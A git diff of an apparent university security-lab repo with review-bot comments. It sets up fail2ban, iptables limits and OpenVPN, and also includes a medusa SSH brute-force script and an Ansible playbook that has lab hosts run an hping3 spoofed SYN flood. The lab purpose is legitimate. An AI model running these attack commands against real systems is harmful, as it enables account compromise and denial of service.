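+# plays will gather facts by default, which contain information about
+# the remote system.
+#
+# smart - gather by default, but don't regather if already gathered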
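Review bot: `host_key_checking = False` under `[defaults]` disables SSH host-key verification for every host Ansible contacts, which removes the only check protecting the control node against a substituted target; that is tolerable for throwaway lab containers whose keys are regenerated on every start, but the file does not say so. Add a comment above it such as `# lab only: container host keys change on every run; do not reuse this config outside the lab`, or keep checking enabled and seed known_hosts from the inventory with `ssh-keyscan` before the play. The file is named `ansible_cfg_text`, and Ansible only auto-loads `ansible.cfg` (or the path in `ANSIBLE_CONFIG`), so unless something copies it into place it is presumably never read.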

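--- a/backup_files/ddos_atck_script.sh
+++ b/backup_files/ddos_atck_script.sh
@@ -0,0 +1,2 @@
+ansible-playbook -u docker -i inventory_w.yml test3.yml -f 4 --ask-pass --ask-become-pass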
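Review bot: The file has no shebang and no `set -e`, so which shell interprets it depends on how it is invoked, and `inventory_w.yml`/`test3.yml` are resolved against the caller's working directory rather than the script's own location; `#!/bin/sh` followed by `cd "$(dirname "$0")" || exit 1` as the first two lines fixes both. The same applies to run.sh, second_script.sh, hello_world.sh, vpn+backup/create-user.sh, vpn+backup/show-conn-user.sh and vpn+backup/show-user.sh in this change.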

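--- a/backup_files/fail2ban_script.sh
+++ b/backup_files/fail2ban_script.sh
@@ -0,0 +1,28 @@
+#!/bin/sh
+sudo apt-get update -y # To get the latest package lists
+sudo apt install rsyslog #instal auth.log
+sudo service rsyslog start #start syslog
+#grep "Failed password" /var/log/auth.log #check for login failures
+#grep "Failed password" /var/log/auth.log | awk ‘{print $11}’ | uniq -c | sort
+sudo cat /var/log/auth.log | grep "Failed password"
+sudo apt install fail2ban -y
+sudo service fail2ban enable
+sudo service fail2ban start
+sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
+sudo sed -i '244d' /etc/fail2ban/jail.local
+sudo sed -i '239 a enabled = true' /etc/fail2ban/jail.local
+sudo sed -i '240 a maxretry = 3' /etc/fail2ban/jail.local
+sudo sed -i '241 a bantime = 300' /etc/fail2ban/jail.local
+sudo sed -i '242 a findtime = 30' /etc/fail2ban/jail.local
+sudo sed -i '243 a chain = INPUT' /etc/fail2ban/jail.local
+sudo sed -i '244 a port = 22' /etc/fail2ban/jail.local
+sudo sed -i '245 a action_ = iptables-multiport[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"]' /etc/fail2ban/jail.local
+sudo service fail2ban restart
+sudo fail2ban-client status sshd
+sudo iptables -L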
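Review bot: The eight `sed -i '244d'` / `'239 a …'` edits patch `/etc/fail2ban/jail.local` by absolute line number, which only does the right thing for the one `jail.conf` layout the author copied from; with any other fail2ban package version the delete removes an unrelated line and the sshd settings land in whatever section happens to be at line 239, silently leaving sshd unprotected, and the edits are re-applied on every run. fail2ban reads drop-ins from `/etc/fail2ban/jail.d/`, so write the override there as a named `[sshd]` section instead (below), which is version-independent and idempotent. Smaller points: `sudo apt install rsyslog` has no `-y`, so an unattended run blocks on the confirmation prompt; `service fail2ban enable` is not a `service` action (use `systemctl enable fail2ban`); and `sudo cat … | grep` is just `sudo grep "Failed password" /var/log/auth.log`. first_script.sh patches `/etc/ansible/ansible.cfg` with the same line-number technique (`sed -i "11i …"`) and has the same fragility.
```sh
# … unchanged: package installation and rsyslog start …
sudo tee /etc/fail2ban/jail.d/sshd.local >/dev/null <<'EOF'
[sshd]
enabled = true
maxretry = 3
bantime = 300
findtime = 30
chain = INPUT
port = 22
action_ = iptables-multiport[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"]
EOF
# … unchanged: fail2ban restart, status and iptables -L …
```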

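--- a/backup_files/first_script.sh
+++ b/backup_files/first_script.sh
@@ -0,0 +1,19 @@
+#!/bin/sh
+#nmap -n -sn 172.25.0.* -oG - | awk '/Up$/{print $2}'
+sudo apt-get update -y # To get the latest package lists
+sudo apt install ansible -y
+sudo apt install sshpass -y
+sudo sed -i "11i host_key_checking = False" /etc/ansible/ansible.cfg
+ansible-playbook -u docker -i inventory.yml test.yml -f 5 --ask-pass --ask-become-pass
+#sudo tcpdump -i eth0
+#now interrupt the process. get its PID:
+#pid=$(ps -e | pgrep tcpdump)
+#echo $pid
+#
+#interrupt it:
+#sleep 5
+#kill -2 $pid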
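Review bot: `sudo sed -i "11i host_key_checking = False" /etc/ansible/ansible.cfg` changes the system-wide Ansible configuration, turning host-key checking off for every Ansible run on that machine rather than for this lab, and it inserts unconditionally, so each re-run adds another copy of the line. Since this change already ships a config fragment with the same setting (backup_files/ansible_cfg_text), prefer a project-local `ansible.cfg` next to the playbook — Ansible reads it from the current directory — or prefix the single invocation with `ANSIBLE_HOST_KEY_CHECKING=False ansible-playbook …`, and leave the global file untouched. In scripts use `apt-get install`, as the first line does, rather than `apt install`; `apt` warns that its command-line interface is not stable.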

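--- a/backup_files/hello_world.sh
+++ b/backup_files/hello_world.sh
@@ -0,0 +1 @@
+echo "Hello World"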

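--- a/backup_files/inventory.yml
+++ b/backup_files/inventory.yml
@@ -0,0 +1,6 @@
+[service]
+172.21.0.2
+172.21.0.3
+172.21.0.4
+172.21.0.5
+172.21.0.6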
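Review bot: The file is an INI-format inventory (a `[service]` group header followed by bare addresses) but carries a `.yml` extension, so Ansible's `yaml` inventory plugin is tried on it first and the file is only parsed by fallback to the `ini` plugin; rename it to `inventory.ini` (or convert it to the YAML `service: hosts:` form) so the name matches the content. The fixed 172.21.0.x addresses also differ from the 172.27.0.x and 172.29.0.x hosts in the committed .retry files, which suggests the Docker subnet changes between runs — presumably why auto_update_hosts exists — so generating the inventory from it rather than committing a snapshot would avoid stale targets. inventory_w.yml has the same naming problem.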

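--- a/backup_files/inventory_w.yml
+++ b/backup_files/inventory_w.yml
@@ -0,0 +1,5 @@
+[service]
+172.21.0.3
+172.21.0.4
+172.21.0.5
+172.21.0.6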

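--- a/backup_files/iptables_rules.sh
+++ b/backup_files/iptables_rules.sh
@@ -0,0 +1,54 @@
+#!/bin/sh
+### 1: Drop invalid packets
+#iptables -t mangle -A PREROUTING -m conntrack --ctstate INVALID -j DROP
+### 2: Drop TCP packets that are new and are not SYN ###
+#iptables -t mangle -A PREROUTING -p tcp ! --syn -m conntrack --ctstate NEW -j DROP
+### 3: Drop SYN packets with suspicious MSS value ###
+#iptables -t mangle -A PREROUTING -p tcp -m conntrack --ctstate NEW -m tcpmss ! --mss 536:65535 -j DROP
+### 4: Block packets with bogus TCP flags ###
+#iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,SYN FIN,SYN -j DROP
+#iptables -t mangle -A PREROUTING -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
+#iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,RST FIN,RST -j DROP
+#iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,ACK FIN -j DROP
+#iptables -t mangle -A PREROUTING -p tcp --tcp-flags ACK,URG URG -j DROP
+#iptables -t mangle -A PREROUTING -p tcp --tcp-flags ACK,PSH PSH -j DROP
+#iptables -t mangle -A PREROUTING -p tcp --tcp-flags ALL NONE -j DROP
+### 5: Block spoofed packets ###
+#iptables -t mangle -A PREROUTING -s 224.0.0.0/3 -j DROP
+#iptables -t mangle -A PREROUTING -s 169.254.0.0/16 -j DROP
+#iptables -t mangle -A PREROUTING -s 172.16.0.0/12 -j DROP
+#iptables -t mangle -A PREROUTING -s 192.0.2.0/24 -j DROP
+#iptables -t mangle -A PREROUTING -s 192.168.0.0/16 -j DROP
+#iptables -t mangle -A PREROUTING -s 10.0.0.0/8 -j DROP
+#iptables -t mangle -A PREROUTING -s 0.0.0.0/8 -j DROP
+#iptables -t mangle -A PREROUTING -s 240.0.0.0/5 -j DROP
+#iptables -t mangle -A PREROUTING -s 127.0.0.0/8 ! -i lo -j DROP
+### 7: Drop fragments in all chains ###
+#iptables -t mangle -A PREROUTING -f -j DROP
+### 8: Limit connections per source IP ###
+iptables -A INPUT -p tcp -m connlimit --connlimit-above 111 -j REJECT --reject-with tcp-reset
+### 9: Limit RST packets ###
+iptables -A INPUT -p tcp --tcp-flags RST RST -m limit --limit 2/s --limit-burst 2 -j ACCEPT
+iptables -A INPUT -p tcp --tcp-flags RST RST -j DROP
+### 10: Limit new TCP connections per second per source IP ###
+iptables -A INPUT -p tcp -m conntrack --ctstate NEW -m limit --limit 60/s --limit-burst 20 -j ACCEPT
+iptables -A INPUT -p tcp -m conntrack --ctstate NEW -j DROP
+### 11:SYNPROXY
+#iptables -t raw -A PREROUTING -p tcp -m tcp --syn -j CT --notrack
+#iptables -A INPUT -p tcp -m tcp -m conntrack --ctstate INVALID,UNTRACKED -j SYNPROXY --sack-perm --timestamp --wscale 7 --mss 1460
+#iptables -A INPUT -m conntrack --ctstate INVALID -j DROP
+### SSH brute-force protection ###
+#iptables -A INPUT -p tcp --dport ssh -m conntrack --ctstate NEW -m recent --set#iptables -A INPUT -p tcp --dport ssh -m conntrack --ctstate NEW -m recent --update --seconds 60 --hitcount 10 -j DROP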
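Review bot: Rules 9 and 10 use `-m limit`, which keeps a single global token bucket, so they are not "per source IP" as the section comment says: one source exceeding 60 new connections per second makes every other client's new TCP connections fall through to the following `DROP`, i.e. the mitigation itself denies service to legitimate clients. Per-source limiting is `-m hashlimit`, e.g. `iptables -A INPUT -p tcp -m conntrack --ctstate NEW -m hashlimit --hashlimit-name newconn --hashlimit-mode srcip --hashlimit-upto 60/s --hashlimit-burst 20 -j ACCEPT` followed by the existing DROP line. The script appends with `-A` and never flushes, so every run adds a duplicate rule set; start with `iptables -F INPUT` (or test with `iptables -C … || iptables -A …`) and persist the result with `iptables-save` so it survives a reboot. The commented SSH brute-force line has two rules fused into one — a `#` inside a word does not start a comment in sh, so if it is ever uncommented `--set#iptables` reaches iptables as a single argument and the rule fails to load; split it back into two lines.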

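--- a/backup_files/medusa_script.sh
+++ b/backup_files/medusa_script.sh
@@ -0,0 +1,10 @@
+#!/bin/sh
+sudo apt-get update -y # To get the latest package lists
+sudo apt install medusa -y
+cp /project/passwd_list.txt .
+medusa -h 172.21.0.4 -u docker -P ./passwd_list.txt -M ssh -f -v 6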

5276
backup_files/passwd_list.txt

File diff suppressed because it is too large

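--- a/backup_files/run.sh
+++ b/backup_files/run.sh
@@ -0,0 +1,2 @@
+ansible-playbook -u docker -i inventory.yml test.yml -f 5 --ask-pass --ask-become-pass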

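--- a/backup_files/script_update.sh
+++ b/backup_files/script_update.sh
@@ -0,0 +1,8 @@
+#!/bin/sh
+sudo apt-get update -y # To get the latest package lists
+#sudo apt install hping3 -y
+#hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 172.25.0.2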

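--- a/backup_files/second_script.sh
+++ b/backup_files/second_script.sh
@@ -0,0 +1,2 @@
+ansible-playbook -u docker -i inventory_w.yml test2.yml -f 4 --ask-pass --ask-become-pass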

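--- a/backup_files/test.retry
+++ b/backup_files/test.retry
@@ -0,0 +1,5 @@
+172.27.0.2
+172.27.0.3
+172.27.0.4
+172.27.0.5
+172.27.0.6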
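Review bot: `.retry` files are written by `ansible-playbook` after a failed run and only list the hosts that failed; they are run-specific output, not configuration, and the addresses in them already disagree with the committed inventories. Add `*.retry` to .gitignore and, if they are not wanted at all, set `retry_files_enabled = False` under `[defaults]` in the Ansible config. The same applies to test2.retry and test3.retry.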

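--- a/backup_files/test.yml
+++ b/backup_files/test.yml
@@ -0,0 +1,112 @@
+---
+- hosts: service
+remote_user: docker
+gather_facts: no
+vars:
+user: "docker"
+tasks:
+# make directory
+- name: make dir for data
+become: true
+file:
+path: "/var/lab/playground/playground-readmongo"
+state: directory
+owner: docker
+group: docker
+mode: '0777'
+# make another directory
+# - name: make another dir for data
+# become: true
+# file:
+# path: "/home/docker/my_dir"
+# state: directory
+# owner: docker
+# group: docker
+# mode: '0777'
+# pare google.com
+# - name: google.com
+# become: yes
+# become_user: "{{ user }}"
+# command: curl http://www.google.com
+# ignore_errors: yes
+# register: configwww
+# - name: ls configwww
+# debug: var=configwww.stdout_lines
+# mk dir
+# - name: remove dir
+# become: yes
+# become_user: "{{ user }}"
+# command: rmdir new_dir
+# ignore_errors: yes
+# register: rmvdir
+# - name: ls rmvdir
+# debug: var=rmvdir.stdout_lines
+# ls -al
+- name: ls -al
+become: yes
+become_user: "{{ user }}"
+command: ls -al #/etc
+ignore_errors: yes
+register: config
+- name: ls config
+debug: var=config.stdout_lines
+# netstat -antlupe
+# - name: netstat
+# become: yes
+# become_user: "{{ user }}"
+# command: netstat -antlupe
+# ignore_errors: yes
+# register: ant
+# - name: ls ant
+# debug: var=ant.stdout_lines
+# install hping3 to all
+# - name: install hping3 to all
+# become: yes
+# become_user: "{{ user }}"
+# command: sudo apt install hping3 -y
+# ignore_errors: yes
+# register: install_hp3
+# - name: ls install_hp3
+# debug: var=install_hp3.stdout_lines
+- name: Refresh connection
+meta: clear_host_errors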
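Review bot: The data directory created by the "make dir for data" task gets `mode: '0777'` even though the same task already sets `owner: docker` and `group: docker`, so the world-writable bits add nothing for the account that uses it and let any other local account replace or plant files there; `'0755'` (or `'0750'`) is sufficient. test2.yml does the same for the script it copies (`mode=0777`), where it matters more because the file is executed right afterwards. The YAML indentation has been flattened in this rendering, so the nesting of the `file:` arguments cannot be verified from the page.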

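--- a/backup_files/test2.retry
+++ b/backup_files/test2.retry
@@ -0,0 +1,4 @@
+172.27.0.3
+172.27.0.4
+172.27.0.5
+172.27.0.6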

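--- a/backup_files/test2.yml
+++ b/backup_files/test2.yml
@@ -0,0 +1,48 @@
+---
+- hosts: service
+remote_user: docker
+sudo: yes
+gather_facts: no
+vars:
+user: "docker"
+tasks:
+# ls -al test
+# - name: ls -al
+# become: yes
+# become_user: "{{ user }}"
+# command: ls -al
+# ignore_errors: yes
+# register: config
+# - name: ls config
+# debug: var=config.stdout_lines
+# transfer script
+- name: Transfer script.
+copy: src=script_update.sh dest=/home/docker mode=0777
+# exec script
+- name: Exec script_update.
+command: sh /home/docker/script_update.sh
+# install hping3
+- name: Ansible apt install hping3.
+become: true
+apt:
+name: hping3
+state: present
+update_cache: true
+# refresh
+- name: Refresh connection
+meta: clear_host_errors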
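Review bot: `sudo: yes` at play level is the pre-2.0 privilege-escalation keyword; it was deprecated in favour of `become: yes` and recent Ansible releases no longer accept it, so depending on the installed version the play either warns or fails to load. The tasks that need root already carry `become: true`, so the play-level line can simply be removed (test3.yml has the same line). `copy: src=script_update.sh dest=/home/docker mode=0777` installs a world-writable script that the next task executes, so any local account on the target that can write to it runs code as the `docker` user; `mode=0755` is enough.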

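--- a/backup_files/test3.retry
+++ b/backup_files/test3.retry
@@ -0,0 +1,4 @@
+172.29.0.3
+172.29.0.4
+172.29.0.5
+172.29.0.6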

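--- a/backup_files/test3.yml
+++ b/backup_files/test3.yml
@@ -0,0 +1,60 @@
+---
+- hosts: service
+remote_user: docker
+sudo: yes
+gather_facts: no
+vars:
+user: "docker"
+tasks:
+# ls -al
+# - name: ls -al
+# become: yes
+# become_user: "{{ user }}"
+# command: ls -al
+# ignore_errors: yes
+# register: config2
+# - name: ls config2
+# debug: var=config2.stdout_lines
+# dos attack async
+- name: dos attack
+command: sudo hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 172.21.0.2 -y
+async: 120
+poll: 0
+# ls -al
+# - name: ls -al
+# become: yes
+# become_user: "{{ user }}"
+# command: ls -al
+# ignore_errors: yes
+# register: config3
+- name: ls config3
+debug: var=config3.stdout_lines
+- name: Refresh connection
+meta: clear_host_errors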
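Review bot: The `ls config3` task prints `config3.stdout_lines`, but the only task that registers `config3` is commented out above it, so the task prints `VARIABLE IS NOT DEFINED!` (or aborts the play where undefined variables are fatal); either restore the registering task or delete the debug. The async task is started with `poll: 0` and nothing registers its job id, so there is no way to check or stop it from the playbook once the play has moved on — if it is kept, `register` it and finish with an `async_status` task so its lifetime is bounded by the play rather than only by the `async: 120` timeout.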

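--- a/backup_files/vpn+backup/cr_vi_sec_vpn_my5.sh
+++ b/backup_files/vpn+backup/cr_vi_sec_vpn_my5.sh
@@ -0,0 +1,26 @@
+#!/bin/bash
+for i in {1..5}
+do
+#create user
+NUM=$i
+USERNAME=sec_vpn_$NUM
+vpn_data=$PWD/openvpn-services/
+docker=registry.vlabs.uniwa.gr:5080/myownvpn
+docker run -v $vpn_data:/etc/openvpn --rm -it $docker easyrsa build-client-full $USERNAME nopass
+docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm $docker ovpn_getclient $USERNAME > $USERNAME.ovpn
+#change file of user ----if needed change ip in here----
+NAME=sec_vpn_$NUM.ovpn
+sudo sed -i '5,7d' ./$NAME
+sudo sed -i '4 a comp-lzo' ./$NAME
+sudo sed -i '5 a resolv-retry infinite' ./$NAME
+sudo sed -i '6 a keepalive 15 60' ./$NAME
+sudo sed -i '7 a remote-cert-tls server' ./$NAME
+sudo sed -i '8 a remote 192.168.1.5 1194 udp' ./$NAME
+sudo sed -i '9 a float' ./$NAME
+done
+cp sec_vpn_* ../test/project/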
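Review bot: The final `cp sec_vpn_* ../test/project/` moves the client profiles into a `project/` directory that, judging by the file list of this change, is tracked in git; each `.ovpn` produced by `ovpn_getclient` embeds the client's private key, generated without a passphrase (`nopass`), so those files are complete VPN credentials and are likely to be committed. Keep them out of the repository (`*.ovpn` in .gitignore), copy them somewhere untracked, and `chmod 600` them. The `sed -i '5,7d'` / `'4 a …'` block rewrites the generated profile by line number and only matches one exact `ovpn_getclient` output layout; the `remote 192.168.1.5 1194 udp` it inserts is needed only because create-vpn.sh generates the server config with `IP=127.0.0.1`, so setting the real address there would make this block unnecessary. `$vpn_data`, `$docker` and `$USERNAME` are unquoted in the `docker run` lines and break if `$PWD` contains a space.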

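--- a/backup_files/vpn+backup/create-user.sh
+++ b/backup_files/vpn+backup/create-user.sh
@@ -0,0 +1,6 @@
+USERNAME=sec2
+vpn_data=$PWD/openvpn-services/
+docker=registry.vlabs.uniwa.gr:5080/myownvpn
+docker run -v $vpn_data:/etc/openvpn --rm -it $docker easyrsa build-client-full $USERNAME nopass
+docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm $docker ovpn_getclient $USERNAME > $USERNAME.ovpn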

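--- a/backup_files/vpn+backup/create-vpn.sh
+++ b/backup_files/vpn+backup/create-vpn.sh
@@ -0,0 +1,47 @@
+#!/bin/bash
+IP=127.0.0.1 # Server IP
+P=1194 # Server Port
+OVPN_SERVER='10.80.0.0/16' # VPN Network
+#vpn_data=/var/lib/swarmlab/openvpn/openvpn-services/ # Dir to save data ** this must exist **
+vpn_data=$PWD/openvpn-services/
+if [ ! -d $vpn_data ]; then
+mkdir -p $vpn_data
+fi
+NAME=swarmlab-vpn-services # name of docker service
+DOCKERnetwork=swarmlab-vpn-services-network # docker network
+docker=registry.vlabs.uniwa.gr:5080/myownvpn # docker image
+docker stop $NAME #stop container
+sleep 1
+docker container rm $NAME #rm container
+# rm config files
+rm -f $vpn_data/openvpn.conf.*.bak
+rm -f $vpn_data/openvpn.conf
+rm -f $vpn_data/ovpn_env.sh.*.bak
+rm -f $vpn_data/ovpn_env.sh
+# create network
+sleep 1
+docker network create --attachable=true --driver=bridge --subnet=172.50.0.0/16 --gateway=172.50.0.1 $DOCKERnetwork
+#run container see ovpn_genconfig
+docker run --net=none -it -v $vpn_data:/etc/openvpn -p 1194:1194 --rm $docker ovpn_genconfig -u udp://$IP:1194 \
+-N -d -c -p "route 172.50.20.0 255.255.255.0" -e "topology subnet" -s $OVPN_SERVER
+# create pki see ovpn_initpki
+docker run --net=none -v $vpn_data:/etc/openvpn --rm -it $docker ovpn_initpki
+# see ovpn_copy_server_files
+#docker run --net=none -v $vpn_data:/etc/openvpn --rm $docker ovpn_copy_server_files
+#create vpn see --cap-add=NET_ADMIN
+sleep 1
+docker run --detach --name $NAME -v $vpn_data:/etc/openvpn --net=$DOCKERnetwork --ip=172.50.0.2 -p $P:1194/udp --cap-add=NET_ADMIN $docker
+sudo sysctl -w net.ipv4.ip_forward=1
+#show created
+docker ps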
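Review bot: `IP=127.0.0.1` is passed to `ovpn_genconfig -u udp://$IP:1194` as the server's public endpoint, so every client profile the container later emits points at loopback and has to be patched afterwards (cr_vi_sec_vpn_my5.sh and vi-userfile.sh both insert `remote 192.168.1.5 1194 udp` by line number for exactly this reason); set `IP` to the reachable server address — or take it from `$1` with `IP=${1:?usage: $0 <server-ip>}` — and the line-number patching becomes unnecessary. `sudo sysctl -w net.ipv4.ip_forward=1` is not persistent and is lost on reboot, after which the VPN silently stops forwarding; write the setting to a file under `/etc/sysctl.d/` as well. `$vpn_data` is built from `$PWD` and used unquoted in the `rm -f` lines, the `-d` test and the `-v` bind mounts, so a working directory containing a space changes which paths are removed or mounted; quote it everywhere.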

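--- a/backup_files/vpn+backup/rm-user.sh
+++ b/backup_files/vpn+backup/rm-user.sh
@@ -0,0 +1,22 @@
+#!/bin/bash
+CLIENTNAME=sec_vpn_
+U=$CLIENTNAME
+vpn_data=$PWD/openvpn-services/
+docker=registry.vlabs.uniwa.gr:5080/myownvpn
+rm -f $vpn_data/pki/reqs/$CLIENTNAME.req
+rm -f $vpn_data/pki/private/$CLIENTNAME.key
+rm -f $vpn_data/pki/issued/$CLIENTNAME.crt
+rm -f $vpn_data/server/ccd/$CLIENTNAME
+rm -f $vpn_data/ccd/$CLIENTNAME
+pem=$(sudo grep "CN=$U$" $vpn_data/pki/index.txt | cut -f4)
+rm -f $vpn_data/pki/certs_by_serial/$pem.pem
+sed -i "/CN=$U$/d" $vpn_data/pki/index.txt
+echo $pem
+docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm -it $docker ovpn_revokeclient $CLIENTNAME remove
+rm -f $vpn_data_user_config/$CLIENTNAME.ovpn
+rm -f $vpn_data_user_config1/$CLIENTNAME.ovpn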
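Review bot: The order of operations defeats the revocation: the script first deletes the client's `.req`/`.key`/`.crt`, its `certs_by_serial` entry and its line in `pki/index.txt` by hand, and only then calls `ovpn_revokeclient`, which needs exactly those PKI entries to revoke the certificate and regenerate the CRL; the likely outcome is that the revoke step fails and the certificate never appears in the CRL, so a client that still holds its `.ovpn` keeps connecting even though the server-side files are gone. Run `docker run -v "$vpn_data:/etc/openvpn" --log-driver=none --rm -it "$docker" ovpn_revokeclient "$CLIENTNAME" remove` first and drop the manual `rm`/`sed` lines; `remove` already cleans up the PKI files. `CLIENTNAME=sec_vpn_` is a placeholder with no client number, and `$vpn_data_user_config`/`$vpn_data_user_config1` are never assigned, so the last two lines expand to `rm -f /sec_vpn_.ovpn`; `set -u` at the top would have caught both. rm_my5.sh repeats the same sequence for each of the five clients.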

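--- a/backup_files/vpn+backup/rm_my5.sh
+++ b/backup_files/vpn+backup/rm_my5.sh
@@ -0,0 +1,30 @@
+#!/bin/bash
+for i in {1..5}
+do
+#delete my 5
+NUM=$i
+CLIENTNAME=sec_vpn_$NUM
+U=$CLIENTNAME
+vpn_data=$PWD/openvpn-services/
+docker=registry.vlabs.uniwa.gr:5080/myownvpn
+rm -f $vpn_data/pki/reqs/$CLIENTNAME.req
+rm -f $vpn_data/pki/private/$CLIENTNAME.key
+rm -f $vpn_data/pki/issued/$CLIENTNAME.crt
+rm -f $vpn_data/server/ccd/$CLIENTNAME
+rm -f $vpn_data/ccd/$CLIENTNAME
+pem=$(sudo grep "CN=$U$" $vpn_data/pki/index.txt | cut -f4)
+rm -f $vpn_data/pki/certs_by_serial/$pem.pem
+sed -i "/CN=$U$/d" $vpn_data/pki/index.txt
+echo $pem
+docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm -it $docker ovpn_revokeclient $CLIENTNAME remove
+rm -f $vpn_data_user_config/$CLIENTNAME.ovpn
+rm -f $vpn_data_user_config1/$CLIENTNAME.ovpn
+#rm file from myfile
+sudo rm ./$CLIENTNAME.ovpn
+done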

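--- a/backup_files/vpn+backup/show-conn-user.sh
+++ b/backup_files/vpn+backup/show-conn-user.sh
@@ -0,0 +1,2 @@
+NAME=swarmlab-vpn-services # name of docker service
+docker exec -it $NAME ovpn_listclients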
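Review bot: show-conn-user.sh and show-user.sh are byte-identical — the same `NAME=swarmlab-vpn-services` line and the same `docker exec -it $NAME ovpn_listclients` — so one of them is either a copy-paste leftover or was meant to do something different (the name suggests listing connected clients rather than all issued ones). Remove one, or make the second script's content match its name.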

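--- a/backup_files/vpn+backup/show-user.sh
+++ b/backup_files/vpn+backup/show-user.sh
@@ -0,0 +1,2 @@
+NAME=swarmlab-vpn-services # name of docker service
+docker exec -it $NAME ovpn_listclients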

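--- a/backup_files/vpn+backup/vi-userfile.sh
+++ b/backup_files/vpn+backup/vi-userfile.sh
@@ -0,0 +1,16 @@
+#!/bin/bash
+for j in {1..5}
+do
+NAME=sec_vpn_$j.ovpn
+sudo sed -i '5,7d' /home/zoiros13/swarmlab-sec/vpn/$NAME
+sudo sed -i '4 a comp-lzo' /home/zoiros13/swarmlab-sec/vpn/$NAME
+sudo sed -i '5 a resolv-retry infinite' /home/zoiros13/swarmlab-sec/vpn/$NAME
+sudo sed -i '6 a keepalive 15 60' /home/zoiros13/swarmlab-sec/vpn/$NAME
+sudo sed -i '7 a remote-cert-tls server' /home/zoiros13/swarmlab-sec/vpn/$NAME
+sudo sed -i '8 a remote 192.168.1.5 1194 udp' /home/zoiros13/swarmlab-sec/vpn/$NAME
+sudo sed -i '9 a float' /home/zoiros13/swarmlab-sec/vpn/$NAME
+done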
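Review bot: The path `/home/zoiros13/swarmlab-sec/vpn/` is hard-wired into every `sed` line, so the script only works on one developer's machine; derive it from an argument (`dir=${1:?usage: $0 <vpn-dir>}`) or from `$PWD` as cr_vi_sec_vpn_my5.sh does. The seven `sed -i` edits are the same block that already exists in cr_vi_sec_vpn_my5.sh, so a shared function or script would stop the two copies drifting apart. The `sed -i` calls run under `sudo` on files in a user home directory, which is unnecessary unless those files are root-owned, and `sed -i '5,7d'` followed by fixed-line inserts is only correct for the one `ovpn_getclient` output layout it was written against.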

899
backup_files/workingjail.local

@ -0,0 +1,899 @@
#
# WARNING: heavily refactored in 0.9.0 release. Please review and
# customize settings for your setup.
#
# Changes: in most of the cases you should not modify this
# file, but provide customizations in jail.local file,
# or separate .conf files under jail.d/ directory, e.g.:
#
# HOW TO ACTIVATE JAILS:
#
# YOU SHOULD NOT MODIFY THIS FILE.
#
# It will probably be overwritten or improved in a distribution update.
#
# Provide customizations in a jail.local file or a jail.d/customisation.local.
# For example to change the default bantime for all jails and to enable the
# ssh-iptables jail the following (uncommented) would appear in the .local file.
# See man 5 jail.conf for details.
#
# [DEFAULT]
# bantime = 1h
#
# [sshd]
# enabled = true
#
# See jail.conf(5) man page for more information
# Comments: use '#' for comment lines and ';' (following a space) for inline comments
[INCLUDES]
#before = paths-distro.conf
before = paths-debian.conf
# The DEFAULT allows a global definition of the options. They can be overridden
# in each jail afterwards.
[DEFAULT]
#
# MISCELLANEOUS OPTIONS
#
# "ignorself" specifies whether the local resp. own IP addresses should be ignored
# (default is true). Fail2ban will not ban a host which matches such addresses.
#ignorself = true
# "ignoreip" can be a list of IP addresses, CIDR masks or DNS hosts. Fail2ban
# will not ban a host which matches an address in this list. Several addresses
# can be defined using space (and/or comma) separator.
#ignoreip = 127.0.0.1/8 ::1
# External command that will take an tagged arguments to ignore, e.g. <ip>,
# and return true if the IP is to be ignored. False otherwise.
#
# ignorecommand = /path/to/command <ip>
ignorecommand =
# "bantime" is the number of seconds that a host is banned.
bantime = 600
# A host is banned if it has generated "maxretry" during the last "findtime"
# seconds.
findtime = 30
# "maxretry" is the number of failures before a host get banned.
maxretry = 5
# "backend" specifies the backend used to get files modification.
# Available options are "pyinotify", "gamin", "polling", "systemd" and "auto".
# This option can be overridden in each jail as well.
#
# pyinotify: requires pyinotify (a file alteration monitor) to be installed.
# If pyinotify is not installed, Fail2ban will use auto.
# gamin: requires Gamin (a file alteration monitor) to be installed.
# If Gamin is not installed, Fail2ban will use auto.
# polling: uses a polling algorithm which does not require external libraries.
# systemd: uses systemd python library to access the systemd journal.
# Specifying "logpath" is not valid for this backend.
# See "journalmatch" in the jails associated filter config
# auto: will try to use the following backends, in order:
# pyinotify, gamin, polling.
#
# Note: if systemd backend is chosen as the default but you enable a jail
# for which logs are present only in its own log files, specify some other
# backend for that jail (e.g. polling) and provide empty value for
# journalmatch. See https://github.com/fail2ban/fail2ban/issues/959#issuecomment-74901200
backend = auto
# "usedns" specifies if jails should trust hostnames in logs,
# warn when DNS lookups are performed, or ignore all hostnames in logs
#
# yes: if a hostname is encountered, a DNS lookup will be performed.
# warn: if a hostname is encountered, a DNS lookup will be performed,
# but it will be logged as a warning.
# no: if a hostname is encountered, will not be used for banning,
# but it will be logged as info.
# raw: use raw value (no hostname), allow use it for no-host filters/actions (example user)
usedns = warn
# "logencoding" specifies the encoding of the log files handled by the jail
# This is used to decode the lines from the log file.
# Typical examples: "ascii", "utf-8"
#
# auto: will use the system locale setting
logencoding = auto
# "enabled" enables the jails.
# By default all jails are disabled, and it should stay this way.
# Enable only relevant to your setup jails in your .local or jail.d/*.conf
#
# true: jail will be enabled and log files will get monitored for changes
# false: jail is not enabled
enabled = false
# "mode" defines the mode of the filter (see corresponding filter implementation for more info).
mode = normal
# "filter" defines the filter to use by the jail.
# By default jails have names matching their filter name
#
filter = %(__name__)s[mode=%(mode)s]
#
# ACTIONS
#
# Some options used for actions
# Destination email address used solely for the interpolations in
# jail.{conf,local,d/*} configuration files.
destemail = root@localhost
# Sender email address used solely for some actions
sender = root@<fq-hostname>
# E-mail action. Since 0.8.1 Fail2Ban uses sendmail MTA for the
# mailing. Change mta configuration parameter to mail if you want to
# revert to conventional 'mail'.
mta = sendmail
# Default protocol
protocol = tcp
# Specify chain where jumps would need to be added in ban-actions expecting parameter chain
chain = <known/chain>
# Ports to be banned
# Usually should be overridden in a particular jail
port = 0:65535
